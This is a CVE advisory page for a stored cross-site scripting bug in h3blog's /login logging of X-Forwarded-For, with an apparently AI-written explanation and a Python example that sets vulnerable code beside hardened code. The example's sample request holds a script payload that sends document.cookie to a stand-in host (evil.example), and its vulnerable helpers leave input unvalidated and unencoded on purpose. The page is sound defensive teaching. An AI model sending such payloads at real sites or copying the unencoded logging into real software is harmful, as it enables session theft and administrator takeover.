CVE-2025-10485
Description
A vulnerability has been found in pojoin h3blog up to 5bf704425ebc11f4c24da51f32f36bb17ae20489. Affected by this issue is the function ppt_log of the file /login of the component HTTP Header Handler. Such manipulation of the argument X-Forwarded-For leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS vulnerability in h3blog's /login endpoint allows an attacker to inject malicious JavaScript via the X-Forwarded-For header, which executes when an administrator views operation logs.
The vulnerability resides in the ppt_log function within the /login endpoint of h3blog. The application records user operation logs, including a client IP address taken from the X-Forwarded-For header via get_real_ip(), and neither validates that value as an IP address nor HTML-encodes it when the log is rendered. An attacker can therefore send a login request whose X-Forwarded-For header carries a script payload; the payload is stored in the log and executes when an administrator views the log page [1].
To exploit this, an attacker sends a POST request to /login with a forged X-Forwarded-For header containing a JavaScript payload. The attack requires no authentication and can be performed remotely, as the endpoint is publicly accessible. The injected script runs in the context of the administrator's browser session [1].
Successful exploitation is a stored cross-site scripting (XSS) condition: the attacker's script can steal cookies or session tokens, read other data visible to the administrator, or issue requests on the administrator's behalf, which amounts to takeover of the administrative account and of whatever the admin interface controls [1].
As of the publication date, the vendor uses a rolling release system, and no specific version information for patches is disclosed. Users should monitor the repository for a fix. Until one is available, two independent mitigations apply: honour X-Forwarded-For only when the request arrives from a trusted reverse proxy and only when the value parses as an IP address (falling back to the socket peer address otherwise), and HTML-encode log fields when they are rendered, so that a value which reaches the log by any other path still cannot execute.
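The following is an added illustration of the source-to-sink path described above and of the two mitigations, written for this page; it is not h3blog's code. The advisory names get_real_ip() and ppt_log, but the functions here (get_real_ip_vulnerable, get_real_ip_hardened, record_login and the two render_log_row_* helpers) are hypothetical stand-ins, the TRUSTED_PROXIES set is an assumed deployment setting, and the two request objects are constructed samples, not captured traffic.

```python
import html
import ipaddress

# Constructed sample requests (not captured h3blog traffic): a normal login
# arriving through a reverse proxy, and one carrying an XSS payload in
# X-Forwarded-For straight from the attacker's host.
PROXIED_LOGIN = {
    "remote_addr": "10.0.0.5",
    "headers": {"X-Forwarded-For": "203.0.113.7"},
}
ATTACK_LOGIN = {
    "remote_addr": "198.51.100.9",
    "headers": {"X-Forwarded-For":
                "<script>fetch('//evil.example/'+document.cookie)</script>"},
}

# Hypothetical set of reverse proxies whose X-Forwarded-For we believe.
# This is an assumption of the example, not an h3blog configuration option.
TRUSTED_PROXIES = {"10.0.0.5"}


def get_real_ip_vulnerable(request):
    """The pattern the advisory describes: believe X-Forwarded-For from anyone."""
    xff = request["headers"].get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()
    return request["remote_addr"]


def get_real_ip_hardened(request, trusted_proxies=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only when the direct peer is a trusted proxy,
    and only if the value parses as an IP address; otherwise log the peer."""
    xff = request["headers"].get("X-Forwarded-For", "")
    if request["remote_addr"] in trusted_proxies and xff:
        candidate = xff.split(",")[0].strip()
        try:
            return str(ipaddress.ip_address(candidate))
        except ValueError:
            pass  # not an IP address: fall through to the socket peer
    return request["remote_addr"]


def render_log_row_vulnerable(entry):
    """Sink: the stored value is interpolated into HTML with no encoding."""
    return f"<tr><td>{entry['action']}</td><td>{entry['ip']}</td></tr>"


def render_log_row_hardened(entry):
    """Sink fixed independently of the source: HTML-encode at output time,
    so a bad value that reached the log by any path still cannot execute."""
    return (f"<tr><td>{html.escape(entry['action'])}</td>"
            f"<td>{html.escape(entry['ip'])}</td></tr>")


def record_login(request, get_ip, render):
    """Hypothetical stand-in for the advisory's logging function: build the
    operation-log entry for a /login request and return the HTML row that an
    administrator's log view would show for it."""
    entry = {"action": "login", "ip": get_ip(request)}
    return render(entry)


def vulnerable_row(request):
    return record_login(request, get_real_ip_vulnerable, render_log_row_vulnerable)


def hardened_row(request):
    return record_login(request, get_real_ip_hardened, render_log_row_hardened)


if __name__ == "__main__":
    print("vulnerable:        ", vulnerable_row(ATTACK_LOGIN))
    print("hardened:          ", hardened_row(ATTACK_LOGIN))
    print("hardened via proxy:", hardened_row(PROXIED_LOGIN))
```

Running the block shows the attacker's header landing verbatim inside a table cell in the vulnerable path, while the hardened path logs the real peer address for the direct-from-attacker request and still records the forwarded address for the proxied one. The output encoding in render_log_row_hardened is the fix that closes the bug on its own; the trusted-proxy check is there because an unconditionally trusted X-Forwarded-For also lets an attacker pick what address the log attributes a login attempt to.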
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (4)
News mentions (0)
No linked articles in our index yet.